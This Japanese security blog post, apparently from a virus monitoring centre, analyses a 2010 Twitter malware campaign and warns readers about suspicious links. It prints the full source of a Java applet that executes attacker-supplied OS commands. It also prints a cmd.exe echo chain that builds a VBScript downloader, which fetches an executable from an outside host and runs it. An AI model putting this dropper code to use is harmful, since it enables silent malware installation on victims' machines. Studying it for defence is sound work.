水曜日, 5月 26, 2010

Twitterマルウェアのダウンローダーメッセージ


上記のメッセージ最近Twitterで現在沢山出ました。「http://bit/lyB6Z…」のURLをクリックしたらマルウェアサイトからJavaエクスプロイト(ファイル名は「Client.jar」)のスクリプトをWindowsのJava環境で実行をされて、色んなトロイマルウェアがダウンロードされちゃいます。現在発見されたのはキーロガーとログイン情報盗むトロイ、ファイル名は「ランダム.exe」です。
Client.jarのコードは下記となります↓
import java.applet.Applet;
import java.io.IOException;
public class Client extends Applet
{
public void init()
{
String windows1 = getParameter("windows1");
String windows2 = getParameter("windows2");
String linux1 = getParameter("linux1");
String linux2 = getParameter("linux2");
String unix1 = getParameter("unix1");
String unix2 = getParameter("unix2");
String os = System.getProperty("os.name").toLowerCase();

if (os.indexOf("win") >= 0)
{
Process w2;
try
{
Process w1 = Runtime.getRuntime().exec(windows1);
w2 = Runtime.getRuntime().exec(windows2);
}
catch (IOException e)
{
e.printStackTrace();
}

}

if (os.indexOf("mac") >= 0)
{
Process u2;
try
{
Process u1 = Runtime.getRuntime().exec(unix1);
u2 = Runtime.getRuntime().exec(unix2);
}
catch (IOException e) {
e.printStackTrace();
}
}
if (os.indexOf("lin") < 0)
return;
Process l2;
try
{
Process l1 = Runtime.getRuntime().exec(linux1);
l2 = Runtime.getRuntime().exec(linux2);
}
catch (IOException e) {
e.printStackTrace();
}
}
}


※このプログラムでOSの環境データを取れます、目的はマルウェアホームページにアクセスされるパソコンでOSコマンドを実行する事です。次のコードへ話が繋ぎます↓

このマルウェアTwitterメッセージのリンク先「http://bit/lyB6Z…」のソースを見たら下記のコードとなります↓

↑このコードは結構マルウェアのホームページ/ブラックサイトで交換されているコードです。目的はマルウェアのダウンロード/ドロッパーの為に作られた。
マルウェアの部分は赤字のマークの所です。このコードを分散したら説明は下記となります↓


cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs

↑このコードの意味はtempフォルダーになるwinconfig.vbsに「Const adTypeBinary = 1」 を書きます。意味がこれからダウンロードされるファイルがバイナリーファイルです。


echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs

↑winconfig.vbsに「Const adSaveCreateOverWrite = 2」を書きます、意味は上書きが出来るようになります。


echo Dim S >> %temp%\winconfig.vbs
echo Dim A >> %temp%\winconfig.vbs
echo Dim DTNDTN >> %temp%\winconfig.vbs
echo S = "ADODB" >> %temp%\winconfig.vbs
echo A = ".Stream" >> %temp%\winconfig.vbs
echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs

↑色々variableを作って、それでバリューを入れる


echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs

↑バイナリーファイル種類だよってWindowsに説明の為にechoでwinconfig.sysに書いて

echo DTNDTN.Open >> %temp%\winconfig.vbs

↑ファイル開くよって書いて

echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs
echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs

↑ファイルを書く、保存為に…

echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs

↑URLダウンロードをゲットするコマンド

echo Dim Http >> %temp%\winconfig.vbs
echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs
echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs
echo Http.Send >> %temp%\winconfig.vbs
echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs
echo End Function >> %temp%\winconfig.vbs

↑ファイルをダウンロードのコマンドをwinconfig.vbsに書きます。

echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs
echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs

↑ファイルを実行したら下記のように動きます↓

start %temp%\winconfig.vbs http://filehost/korehaMALWAREdayo.exe %temp%\update.exe

↑マルウェアをダウンロードされてしまう状況です。

※このドロッパー/ダウンローだスクリプトは裏で動いていますので、WindowsXP以下なら何のメッセージが無い状態でダウンロードが出来ます。

では、このような仕組みでTwitter疑わしいメッセージのリンクをクリックするとマルウェアに感染されますので、気をつけて下さい。
----
株式会社ケイエルジェイテック
http://www.kljtech.com
ウイルスモニターセンター

0 件のコメント:

コメントを投稿